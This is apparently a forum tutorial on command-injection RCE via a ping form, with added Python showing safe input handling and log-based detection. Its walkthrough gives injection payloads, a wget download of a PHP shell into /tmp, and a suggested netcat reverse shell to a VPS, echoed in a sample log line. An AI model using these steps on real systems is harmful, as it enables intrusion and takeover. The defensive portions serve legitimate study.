[Tutorial][HQ] Remote Code Execution [Noob Friendly]
Disclaimer
I am not responsible for how you use this tutorial; it was created for educational purposes only.
Intro
Hello guys and welcome to my tutorial on Remote Code Execution (RCE).
I will not be providing any real targets, but I will be walking through a realistic example.
RCE is a very useful class of bug because it lets you run commands directly on the target system,
which means you can upload files, delete files and otherwise manipulate the box as you wish.
How RCE happens
RCE most commonly happens through unsanitised input: a web page takes something you typed into a form and passes it straight into a system command.
The example used in this tutorial is a "ping an IP" form: the page takes an IP address from an input box and runs ping against it on the server, then shows you the output.
Check target
With the example above it was relatively simple to check whether the input was vulnerable: type a ";" (without the quotes) into the box, followed by a *nix command, for example
Code:
;uname -a
The ";" is a command separator in the shell. Whatever command the page builds around your input (something like "ping -c 4 <your input>") ends at the ";", and the shell then runs the command you appended as a second, separate command.
If the page shows the output of uname -a (kernel name, version, architecture), your input is being passed to a shell unsanitised and the box is vulnerable.
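To make the check above concrete, here is an added example (not code from the original post) of the server-side pattern that makes the ping box vulnerable, beside the hardened form. The command string, the rough model of how the shell splits it at ";", and the function names are all assumptions for illustration; the only real behaviour relied on is Python's standard library.

```python
import ipaddress
import shlex
import subprocess


def build_vulnerable_command(user_input):
    # The pattern behind the tutorial's ping box: the text typed into the form
    # is glued onto a fixed command string and handed to /bin/sh (for example
    # via os.system() or subprocess.run(..., shell=True)). Only the command
    # line is built here; it is never executed in this example.
    return "ping -c 1 " + user_input


def shell_commands_in(cmdline):
    # Rough model of what /bin/sh does with ';': each ';' ends one simple
    # command and starts another. Enough to show the split; not a full shell
    # parser (quoting, '|', '&&' and so on are ignored).
    return [part.strip() for part in cmdline.split(";") if part.strip()]


def quoted_command(user_input):
    # Second-best fix if the command really must go through a shell:
    # shlex.quote wraps the input in single quotes so the ';' stays inside
    # one argument to ping instead of starting a new command.
    return "ping -c 1 " + shlex.quote(user_input)


def safe_ping_argv(user_input):
    # Preferred fix: require a bare IP address (ipaddress raises ValueError
    # for ';uname -a', '8.8.8.8;ls', hostnames, anything that is not an IP)
    # and build an argv list so no shell ever sees the string.
    addr = ipaddress.ip_address(user_input.strip())
    return ["ping", "-c", "1", str(addr)]


def run_safe_ping(user_input, timeout=10):
    # Execute without shell=True: the argv list goes straight to execve(),
    # so shell metacharacters carry no meaning even if validation is loosened.
    return subprocess.run(
        safe_ping_argv(user_input),
        capture_output=True, text=True, timeout=timeout, check=False,
    )


if __name__ == "__main__":
    payload = ";uname -a"
    print(shell_commands_in(build_vulnerable_command(payload)))  # ['ping -c 1', 'uname -a']
    print(quoted_command(payload))                               # ping -c 1 ';uname -a'
    print(safe_ping_argv("127.0.0.1"))                           # ['ping', '-c', '1', '127.0.0.1']
    try:
        safe_ping_argv(payload)
    except ValueError as err:
        print("rejected:", err)
```

The point of the two fixes together: validation decides what input is allowed, and the argv list removes the shell from the path entirely, so a future change to the validation cannot reintroduce the injection.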
Okay so now what
So through the input box we have been able to execute a *nix command and display basic box info.
What else can we do? Let's find out which OS the box is running with the following command,
Code:
;cat /etc/issue
This prints the login banner from /etc/issue, which on most distributions names the OS and its version.
Well that was cool
So far we have only pulled some minor, not very useful, info.
I am sure you are thinking "enough of the minor stuff, let's move on and get r00t".
Now let's try listing the current directory with "ls" (entered through the input box as ";ls", like before).
We got no output!?! I guess it's not that vulnerable, let's move on shall we...
WRONG! An empty result just means the web server's working directory could not be listed (it may be empty, or the account the web server runs as may lack read permission on it); the injection itself still worked.
As shown before, ";" separates commands, so let's chain two of them: move up one directory, then list it.
Code:
;cd ..;ls
Success, we listed the directories. +1 to you sir!
Now it is widely known that the tmp directory is usually world-writable, so let's navigate there and list it by entering the following:
Code:
;cd ..;cd tmp;ls
(This relies on the parent of the web server's working directory being /, as it was in this example; an absolute path, cd /tmp, gets you there no matter where the server started.)
Woo! We listed a writable directory. Now let's wget a shell into it by entering this:
Code:
;cd ..;cd tmp;wget -O a.php <url-of-your-shell>
Use -O a.php to choose the output filename: by default wget names the download after the URL, and redirecting wget's stdout with "> a.php" would not put the shell into a.php. (The original post linked the shell it used; that link is not available here, hence the placeholder.)
Now that your shell is in tmp, you can run it through the same injection point with the PHP command line interpreter:
Code:
;cd ..;cd tmp;php a.php
(/tmp is not normally inside the web root, so you cannot simply browse to a.php; that is why it is executed with php from the injected command.)
Alternative to a web shell
My favourite way of gaining access to a site is the following:
test for a vulnerable input and, instead of executing a bunch of system commands one at a time, spawn a shell on the server and have it connect back to netcat listening on a VPS.
For the actual commands to spawn a reverse shell on the server, I suggest trying the following examples; they have always served me well:
[link to reverse shell examples not available here]
Obviously change "10.0.0.1" to your VPS IP and change the port; I suggest using port 443 as it is commonly allowed out of the network.
From there, for ease of use, I will normally spawn a PTY (pseudo-terminal) shell running bash with the following command
Code:
;python -c 'import pty; pty.spawn("/bin/bash")'
Tutorial written 100% by me.
I really hope that you enjoyed this tutorial as much as I enjoyed writing it!
Thanks for reading guys.
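Every step in this tutorial goes through the web server, so it also lands in the access log. The following is an added example (not from the original post) of the detection side: it parses combined-format log lines, URL-decodes the query parameters and flags any value that contains shell metacharacters or, for the ping parameter, is not a bare IP address. The log lines are constructed for this example and mirror the commands used above; the parameter name "ip", the path /ping.php and the addresses are assumptions.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache/nginx "combined" format (not real
# traffic): one normal use of the ping box, then the tutorial's injection
# steps as they would appear after the browser URL-encodes them, then an
# unrelated request.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2015:12:00:01 +0000] "GET /ping.php?ip=8.8.8.8 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2015:12:00:09 +0000] "GET /ping.php?ip=%3Buname+-a HTTP/1.1" 200 640 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2015:12:00:15 +0000] "GET /ping.php?ip=%3Bcat+%2Fetc%2Fissue HTTP/1.1" 200 600 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2015:12:00:31 +0000] "GET /ping.php?ip=%3Bcd+..%3Bcd+tmp%3Bwget+-O+a.php+http%3A%2F%2F198.51.100.7%2Fa.txt HTTP/1.1" 200 700 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Mar/2015:12:01:00 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Fields of a combined-format line that matter here: client IP, timestamp,
# method, request target and status.
REQUEST_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Shell metacharacters that turn one command into several: ';', '|', '&',
# newline, backtick, and '$(' for command substitution. Checked after
# URL-decoding, so %3B is caught as ';'.
SHELL_META_RE = re.compile(r'[;|&`\n]|\$\(')


def param_values(target):
    # parse_qs decodes %XX escapes and '+' for us and returns {name: [values]}.
    return parse_qs(urlsplit(target).query, keep_blank_values=True)


def find_injection_attempts(log_text, ip_params=("ip",)):
    # Returns one record per suspicious parameter value, with the reasons.
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # malformed or non-request line; skip rather than guess
        for name, values in param_values(m["target"]).items():
            for value in values:
                reasons = []
                if SHELL_META_RE.search(value):
                    reasons.append("shell metacharacter")
                if name in ip_params:
                    # The ping box should only ever receive a bare IP address.
                    try:
                        ipaddress.ip_address(value.strip())
                    except ValueError:
                        reasons.append("not a bare IP address")
                if reasons:
                    hits.append({"src": m["src"], "ts": m["ts"], "param": name,
                                 "value": value, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_injection_attempts(SAMPLE_LOG):
        print(hit["ts"], hit["src"], hit["param"], repr(hit["value"]), hit["reasons"])
```

Two things worth noticing in the output: the wget line reveals the attacker's download host, which is the indicator to block and hunt for elsewhere, and every hit returned status 200, so response codes alone would never have surfaced this; the decoded parameter value is what gives it away.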